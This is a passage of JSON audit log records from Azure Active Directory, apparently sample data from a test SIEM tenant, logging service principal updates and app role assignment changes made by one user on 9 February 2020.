"actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": 
"5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "528b5206-f6de-4c1f-86db-5f750a9960c9"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:33:26.1638042Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38438642"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "b2cc2456-5ac5-4399-b960-82a40036476f"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, 
{"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": 
"actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "ac045271-8d7f-49b2-abc9-5130051d879f"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:06.3062012Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38464425"}, {"Name": "env_popSample", "Value": "0"}, 
{"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "7f09b681-251f-4ff0-97cf-5247891b6981"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "ac045271-8d7f-49b2-abc9-5130051d879f"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:06.3062012Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38464434"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": 
"env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "d8a2ae24-a752-4f8e-adca-c57189a76a71"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": 
"ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "ac045271-8d7f-49b2-abc9-5130051d879f"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:06.3062012Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38464425"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "7f09b681-251f-4ff0-97cf-5247891b6981"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": 
"asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": 
"18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "ac045271-8d7f-49b2-abc9-5130051d879f"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:06.3062012Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38464434"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, 
{"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "d8a2ae24-a752-4f8e-adca-c57189a76a71"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", 
